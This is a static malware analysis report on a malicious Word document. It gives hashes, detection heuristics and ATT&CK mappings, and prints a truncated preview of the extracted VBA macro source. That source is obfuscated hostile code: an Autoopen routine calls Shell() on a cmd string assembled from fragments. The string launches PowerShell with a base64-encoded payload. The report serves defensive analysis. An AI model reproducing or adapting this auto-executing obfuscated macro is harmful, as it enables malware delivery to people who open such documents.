Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6deeaa4b82b75ea1…

MALICIOUS

Office (OLE)

107.8 KB Created: 2018-06-05 15:12:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: b24ebb229d5abeabe9882b695f9f9afa SHA-1: 645da2940767d804fa461705f1d25ef0cc9ac955 SHA-256: 6deeaa4b82b75ea137eb1ccaab3deee2e3e8c2fdcf28a3ed536c39fb7e4c3541
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon document opening. The critical heuristic firing for 'OLE_VBA_SHELL' and the presence of a Shell() call within the VBA code strongly indicate that the macro is intended to execute an external command. This command is likely used to download and execute a secondary payload, a common pattern for malware delivery.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11626 bytes
SHA-256: a2f29107f6ac9687700f493d7d5685998479a9f78762d7d625d2b903727216de
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "mBHNtDr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function EQqnOnMBHwr()
On Error Resume Next
DirMs = Hex(RPQWiA + Hex(cUFPc) * 19848 + Round(NwrRZ))
qVfKs = Cos(PVYApZ)
FEadjY = CDate(hUbqV)
aSBFn = Cos(nYHvjF)
DltDUQ = Hex(pFSnUH + Hex(XnVupo) * 34933 + Round(zTTMP))
NzIrXF = Cos(QoQGZ)
kVzOkj = CDate(PllBtQ)
znZkH = Cos(CbHJw)
EQqnOnMBHwr = oOvDZiYA + Shell(uqwzWHNa + Chr(vYJHbsFsVj + vbKeyC + KjzRzmFo) + iKfVI + kUHNorY + EKoOwGiXbN + TRwZZsUzjk + MDFzo + sEDRqjv, 79691 - 79691)
BXHzFn = Hex(IikzF + Hex(jhXcLH) * 94567 + Round(tXcOf))
YdINqS = Cos(fKImjN)
IdNpTC = CDate(TfzwBw)
HzikZo = Cos(faWHnu)
End Function
Sub Autoopen()
On Error Resume Next
XOqfu = Hex(zPJnu + Hex(YFzIRo) * 37338 + Round(XKdBGZ))
cDrijH = Cos(wQIRH)
qspqpv = CDate(mhRFT)
viMkp = Cos(UjWLS)
EQqnOnMBHwr
OVzIh = Hex(AjnIf + Hex(mMLKA) * 91772 + Round(mOMMvj))
TsmzTj = Cos(lbZQd)
QEmjm = CDate(rwdMKf)
ZjqBJD = Cos(BhHuo)
End Sub


Attribute VB_Name = "zzBkltXvVhcjZ"
Function iKfVI()
On Error Resume Next
qTbSd = Hex(jFZwnI + Hex(BmujLC) * 75109 + Round(tdFpWY))
rZkDlj = Cos(WuzOS)
bkFaFM = CDate(zUmzT)
CwqWd = Cos(YhOzM)
vTwFGawUu = "md OWocPl" + "HvMsciw" + " AM" + "OX"
WwlPzh = Hex(koWJYi + Hex(JOzXnm) * 70307 + Round(dTjYW))
tQNks = Cos(iQXjUF)
jhjnR = CDate(twJirM)
wHSSjb = Cos(oqXJY)
XsAaoWZH = "ZLHdmMqFlAr" + "dajMC zrHZV" + "qqEhPwduZ " + "&     %^c^o^" + "m^S^p^E^" + "c^%     %^c" + "^o^m^S^p^E^c" + "^% "
mAtrPC = Hex(kBhzjP + Hex(cLjiWY) * 35548 + Round(bzFAsu))
sKXOk = Cos(sDSTo)
pzZVmU = CDate(icGomA)
tYvmO = Cos(nXIWa)
lYVlWFWaR = "    /V " + "   " + "     /" + "c   " + "        set %ab" + "HShlkMPZfWuUO%" + "=wkKEMWQ&&s" + "et %RGmTJitE"
ickIR = Hex(itdvC + Hex(SjzLkm) * 42037 + Round(OXKTHj))
irRoC = Cos(UpSwUp)
EGkzWT = CDate(iMbnW)
pDGRQ = Cos(lJDCL)
KkSmE = "d%" + "=p&&set %aKjQ" + "ChliTiwpzZ%" + "=o^w&&" + "set %zpRnh" + "uwtcraRB" + "SO%=RLnbh" + "tzvVqf&&set %"
zhwqi = Hex(PwvfH + Hex(MwoMWR) * 30698 + Round(SBERiB))
TEQAEZ = Cos(WlVrhN)
ZFKvU = CDate(TMYmm)
howcjH = Cos(fvsifD)
pMjGR = "ODXsRTvRsj%=!" + "%RGmTJitEd%!" + "&&set %RLSpMD" + "LHc"
WZCrf = Hex(CFswuW + Hex(wOHfi) * 27639 + Round(sCYJo))
Eichai = Cos(HitKhH)
kbvBh = CDate(tjRoM)
RlVUA = Cos(DvfUcL)
GdKCDmL = "QzCRSj%=fTDMik" + "G&&" + "set" + " %IzCcMFBIMs" + "ZvY%=e^r&" + "&set %UNmWuQSj" + "vFajz%" + "=!%aKjQC"
QiHOU = Hex(wWMiQG + Hex(bdqYQ) * 77401 + Round(aNGmO))
RdLWQw = Cos(jRjlRw)
OdEDEN = CDate(QZEHDo)
vCYVAc = Cos(ULpRRW)
ZPXEGnmrqq = "hliTiwpzZ%!&&s" + "et %Fabz" + "iGv%=s&&set" + " %ttZ" + "uiGqWRrP" + "fhJB%=OqKlOTJ" + "VJ&&set %GS" + "krr"
iKfVI = vTwFGawUu + XsAaoWZH + lYVlWFWaR + KkSmE + pMjGR + GdKCDmL + ZPXEGnmrqq
End Function
Function kUHNorY()
On Error Resume Next
KwFGTw = Hex(wIChA + Hex(ADGPM) * 19083 + Round(lOIQRU))
tSPlm = Cos(nGczAk)
kwtVnz = CDate(dQEaF)
dFvoo = Cos(wjNdtR)
KCUnYjwXYlB = "PlSb" + "GMc" + "A%=he&&set %r" + "bQuZCXXdlN%=ll&" + "&!%ODXsRTv"
JbuaHO = Hex(RHmUmc + Hex(HjcOp) * 61421 + Round(NhKoLL))
IXVADs = Cos(ljqwLc)
VTbBLY = CDate(AlPElP)
tkmwDq = Cos(kRUjk)
fkGsU = "Rsj%!!%UNm" + "WuQSjvFajz%!!" + "%IzCcMFBIMs" + "ZvY%!!%Fabzi" + "Gv%!!%GSkrrP" + "lSbGMcA"
VzmRdC = Hex(sOjmzm + Hex(ImFvRd) * 90701 + Round(zDAHmh))
CGSbzV = Cos(wzaib)
iBAwQ = CDate(AzLYRG)
dAiQWQ = Cos(GMcTX)
wWICp = "%!!%r" + "bQuZ" + "CXXdlN%!  -e" + " KABuAEUAVwAtA" + "G8AYgBqAEUAY" + "wBUACAAIABTAHk" + "AUwBUAGUAbQ"
ZHnHVj = Hex(rNwCD + Hex(phnqhB) * 39938 + Round(sAQhD))
UwSYj = Cos(bXsKD)
iEnPC = CDate(MjbZTV)
SCWhHX = Cos(RRivvZ)
oWVhFVkSPC = "AuAE" + "kAbwAu" + "AEMAbwBtAHAAcgB" + "FAFMAcwBJ" + "AG8AbgAuAG" + "QA"
iOSpc = Hex(iTPicw + Hex(UXqudw) * 57286 + Round(WEplm))
mQWsUc = Cos(iRIkq)
QznsEI = CDate(FtanRw)
IIJcDq = Cos(sCtlH)
jjFhLIG = "RQBmAGwAYQ" + "BUAE" + "UAUwB0AFIARQB" + "hAE0AKABbA" + "HMAW" + "QBzAHQAR" + "QBtAC4AaQBP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.